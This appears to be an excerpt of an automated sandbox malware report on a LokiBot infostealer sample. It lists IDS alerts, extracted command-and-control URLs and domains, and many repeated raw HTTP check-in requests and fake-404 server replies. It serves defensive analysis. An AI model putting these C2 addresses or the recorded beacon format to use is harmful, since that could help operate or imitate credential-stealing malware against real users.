                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50062 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50060
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:49829
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50058
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50066 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50066 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50066 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50064
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50066 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50065
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50057
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50053
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50056
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50059 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50059 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50059 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50059 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50061 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50061 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50061 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50061 -> 104.21.64.1:80
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50066
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50059
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50061
                  Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.64.1:80 -> 192.168.2.4:50067
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.64.1 80Jump to behavior
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: global trafficHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 149Connection: close
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B522EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00B522EE
                  Source: global trafficDNS traffic detected: DNS query: touxzw.ir
                  Source: unknownHTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 176Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kq2Gao6aEEVU4YpaEjla0YSI9MrTb3dwHgz3P5hruyZep6sj0a2Bwqn%2FQ%2BdEOyPsIwUePpHFx6ThnmwPq6oisYgBrc%2BSitf6d1Qee7GeJyOIwzsJSjA5lDs3eUM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b25e25fc642eb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1689&rtt_var=844&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrSMNXPssx75MUalSnsg7GGncYtEB31%2BUEm4TUsGX%2F%2Fd4Dj8SeNW2BMsSm7aMn76e%2BVvjHyUxaCKoGfILgUalKtjSWih0ITWaqbEVErdJDqQ5DsRiIghbG43k58%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b25ef1d0f7ca5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=124916&min_rtt=124916&rtt_var=62458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=414&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MyLI3q7%2FAEOJv4GlrNlYTiCQRgiyxnh%2BEoQ1hr9ZIcqWeb3kpwB%2BQJRxH9gRPeJen0HO2Z9bwVoYGx8lg8r4eVI3RZY4LLiFRu6R7mdvmJaU8Nzy5F4u7liCOjo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b25f49d5f8c36-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=9478&min_rtt=9478&rtt_var=4739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E69wBaMWeoagsgbyqtg2l%2Bh8jjaynx96ZNg8eikSyd%2BZQyE1A9jTtUdRvjSe%2B2PS9UFORklS%2Fw4QEuN3kqsp6vcFNro8fepSUN4Jw5%2Fk6tL4Ya29C%2BzPXQZGAQU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b26011dbb0f49-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EebD8zQDEF6DmQgpPZsFbuHFK0h8J99uqUNBiXEG9xEolG1yMrnac8C5RlDEY2D5lwGVQg7lNvS9rKDpKiA9rQRCL%2B3lLIx1byJkR8cyDkV%2B5gxc8oNOIPMWlzQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b260f8f17c477-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MIw5l8tjXhoGM2wfeWHKuirceM8H4i2oB%2F9pa2YkhqyKcqj9VyZx%2BHMDuvoaUr5%2FhyDNN5oyfKtVLHZlf%2F1oK82kREFP4u0c%2FPXrSfX8HyJP7VA3paipI926Yw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2627fc2a43f8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1733&rtt_var=866&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:43:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7t5gVaAOXgHqYf4VGzzJuqmIt26eofZ5Id5JZej4eB%2BOHVIEZAzzSzR84eqeViuAKvu92WZ6Zajrh5GQ0ndZ48LoBciu7aAA29uUVKRLzfWRzZA2y9tgVgVh4mg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b264c7dd041e0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1789&rtt_var=894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
